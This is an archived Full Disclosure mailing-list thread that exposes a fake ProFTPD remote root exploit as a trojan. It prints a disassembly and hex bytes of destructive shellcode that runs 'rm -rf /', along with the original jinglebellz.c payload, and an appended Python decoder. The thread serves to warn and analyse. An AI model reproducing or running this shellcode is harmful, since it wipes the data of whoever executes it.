Full Disclosure mailing list archives

Trojan author revealed (was: Re: ProFTPD-1.2.9rc2 remote root exploit)


From: mitch_hurrison () ziplip com
Date: Fri, 24 Oct 2003 16:15:18 -0700 (PDT)

Hi list,

Hrmm. Ok I'm no Sherlock Holmes but even I could see through this
'analysis'. This is obviously an elaborate attempt to soil the reputations
of the fine people, dare I say heroes of information security, at
GOBBLES security. 

Let's examine the case at hand:

1) Someone makes the effort of cutting up an existing public GOBBLES
shellcode. An act that requires just as much effort as writing
original opcode.

2) This cutup version is used in a 'trojan' even my grandmother
would be able to spot. (Obscure in-exploit overflows are way more
effective folks, ask HD "I pioneered screensavers" Moore). 

3) Some random hero pops up on the list pointing out that
'hey, this is GOBBLES shellcode *WINK*'

Now who, on God's green earth, would recognise shellcode from
an obscure exploit that was published months ago, if they
didn't have it fresh in memory? 

So I think it's rather obvious that either zeroboy or one of his
friends is responsible for this trojan, and he has some sort of
grudge towards GOBBLES. Either that or he
has a serious hardon for memorising hex opcode buffers.

With regards,
Mitch

-----Original Message-----
From: zero [mailto:zeroboy () arrakis es]
Sent: Friday, October 24, 2003, 1:19 PM
To: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] ProFTPD-1.2.9rc2 remote root exploit


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hmmm, let's see:

Dump of assembler code for function shellcode:
0x08049480 <shellcode+0>:       xor    %eax,%eax
0x08049482 <shellcode+2>:       push   %eax
0x08049483 <shellcode+3>:       push   $0x582f2066
0x08049488 <shellcode+8>:       push   $0x722d206d
0x0804948d <shellcode+13>:      push   $0x7258632d
0x08049492 <shellcode+18>:      push   $0x41414141
0x08049497 <shellcode+23>:      push   $0x41414141
0x0804949c <shellcode+28>:      push   $0x41414141
0x080494a1 <shellcode+33>:      push   $0x41414141
0x080494a6 <shellcode+38>:      push   $0x4368732f
0x080494ab <shellcode+43>:      push   $0x6e69622f // 
/bin/shCAAAAAAAAAAAAAAAA/cXrm -rf /X
0x080494b0 <shellcode+48>:      xor    %eax,%eax
0x080494b2 <shellcode+50>:      mov    %al,0x7(%esp,1)
0x080494b6 <shellcode+54>:      mov    %al,0x1a(%esp,1)
0x080494ba <shellcode+58>:      mov    %al,0x23(%esp,1)
0x080494be <shellcode+62>:      mov    %esp,0x8(%esp,1)
0x080494c2 <shellcode+66>:      xor    %ebx,%ebx
0x080494c4 <shellcode+68>:      lea    0x18(%esp,1),%ebx
0x080494c8 <shellcode+72>:      mov    %ebx,0xc(%esp,1)
0x080494cc <shellcode+76>:      xor    %ebx,%ebx
0x080494ce <shellcode+78>:      lea    0x1b(%esp,1),%ebx
0x080494d2 <shellcode+82>:      mov    %ebx,0x10(%esp,1)
0x080494d6 <shellcode+86>:      mov    %eax,0x14(%esp,1)
0x080494da <shellcode+90>:      xor    %ebx,%ebx
0x080494dc <shellcode+92>:      mov    %esp,%ebx
0x080494de <shellcode+94>:      lea    0x8(%esp,1),%ecx
0x080494e2 <shellcode+98>:      xor    %edx,%edx
0x080494e4 <shellcode+100>:     lea    0x14(%esp,1),%edx
0x080494e8 <shellcode+104>:     mov    $0xb,%al
0x080494ea <shellcode+106>:     int    $0x80
0x080494ec <shellcode+108>:     xor    %ebx,%ebx
0x080494ee <shellcode+110>:     xor    %eax,%eax
0x080494f0 <shellcode+112>:     inc    %eax
0x080494f1 <shellcode+113>:     int    $0x80
0x080494f3 <shellcode+115>:     add    %al,(%eax)
End of assembler dump.

Let's give credits to the original c0d3rs of this shellcode. Nobody 
remembers jinglebellz.c?

<snip>
/*
            jinglebellz.c - local/remote exploit for mpg123
            (c) 2003 GOBBLES Security seXForces

[...]

unsigned char linux_shellcode[] = /* contributed by antiNSA */
         "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x3b\x50\x31\xc0\x68\x6f"
         "\x72\x74\x0a\x68\x6f\x20\x61\x62\x68\x2d\x63\x20\x74\x68\x43"
         "\x54\x52\x4c\x68\x73\x2e\x2e\x20\x68\x63\x6f\x6e\x64\x68\x35"
         "\x20\x73\x65\x68\x20\x69\x6e\x20\x68\x72\x66\x20\x7e\x68\x72"
         "\x6d\x20\x2d\xb3\x02\x89\xe1\xb2\x29\xb0\x04\xcd\x80\x31\xc0"
         "\x31\xff\xb0\x05\x89\xc7\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66"
         "\xba\x70\x50\x52\xb3\x02\x89\xe1\x31\xd2\xb2\x02\xb0\x04\xcd"
         "\x80\x31\xc0\x31\xdb\x31\xc9\x50\x40\x50\x89\xe3\xb0\xa2\xcd"
         "\x80\x4f\x31\xc0\x39\xc7\x75\xd1\x31\xc0\x31\xdb\x31\xc9\x31"
         "\xd2\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72\x68\x2d\x63\x58"
         "\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41\x41\x41"
         "\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f\x62\x69"
         "\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44\x24\x23"
         "\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24\x0c\x31"
         "\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14\x31\xdb"
         "\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0\x0b\xcd"
         "\x80\x31\xdb\x31\xc0\x40\xcd\x80";

</snip>

Well well, just a nice copy paste of some of it? :pPpPpPppP

And the exact cmd is:
execve("/bin/sh", {"/bin/sh", "-c", "rm -rf /", NULL}, {"rm -rf /", NULL})

NOTE: In this one ~ is changed to a nicer one, /

Have a nice turkey.

Cheerz



www.citfi.org
www.podergeek.com
**********************************
"The further backward you look, the further forward you can see" Winston 
Churchill
"Access is GOD..."


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
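As an added example (not code from either poster), the following Python rebuilds the string that the quoted push sequence leaves on the stack, derives the execve() arguments from the store offsets in the dump, and re-encodes the pushes as bytes to locate the single changed byte (~ to /) against the jinglebellz.c shellcode. The dump excerpt and the byte string are copied from the message above; the argv offsets 0x18 and 0x1b are taken from its lea instructions.

```python
import re
import struct

# Constructed excerpt of the gdb dump quoted above: the push immediates plus
# the three byte stores that NUL-terminate the strings.
TROJAN_DUMP = """\
push   $0x582f2066
push   $0x722d206d
push   $0x7258632d
push   $0x41414141
push   $0x41414141
push   $0x41414141
push   $0x41414141
push   $0x4368732f
push   $0x6e69622f
mov    %al,0x7(%esp,1)
mov    %al,0x1a(%esp,1)
mov    %al,0x23(%esp,1)
"""
# The four pushes that open the same sequence in jinglebellz.c's
# linux_shellcode[] (bytes copied from the quoted message).
JINGLEBELLZ_PUSHES = (b"\x68\x66\x20\x7e\x58\x68\x6d\x20\x2d\x72"
                      b"\x68\x2d\x63\x58\x72\x68\x41\x41\x41\x41")

def push_imms(dump):
    return [int(m, 16) for m in re.findall(r"push\s+\$0x([0-9a-f]+)", dump)]

def stack_string(dump):
    """Bytes left at %esp: each push writes a little-endian dword below the
    previous one, so the last push sits at the lowest address.  The
    'mov %al,OFF(%esp,1)' stores (with %al == 0) then write the NULs."""
    buf = bytearray(b"".join(struct.pack("<I", v) for v in reversed(push_imms(dump))))
    for off in re.findall(r"mov\s+%al,0x([0-9a-f]+)\(%esp", dump):
        buf[int(off, 16)] = 0
    return bytes(buf)

def execve_args(dump):
    """(path, argv) as execve() sees them.  The dump stores %esp, %esp+0x18 and
    %esp+0x1b at 0x8/0xc/0x10(%esp) and zeroes 0x14(%esp), so argv is the three
    strings at those offsets followed by NULL."""
    buf = stack_string(dump)
    cstr = lambda off: buf[off:buf.index(0, off)].decode()
    return cstr(0), [cstr(0), cstr(0x18), cstr(0x1b)]

def reuse_diff(dump, published):
    """Re-encode the pushes as x86 bytes (0x68 + imm32) and list the byte
    offsets where the trojan's copy differs from the published shellcode."""
    mine = b"".join(b"\x68" + struct.pack("<I", v) for v in push_imms(dump))
    return [(i, x, y) for i, (x, y) in enumerate(zip(mine, published)) if x != y]
```

reuse_diff() reports offset 3 of the first push: 0x2f ('/') in the trojan where jinglebellz has 0x7e ('~'), which is the only edit between the two copies of this sequence.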
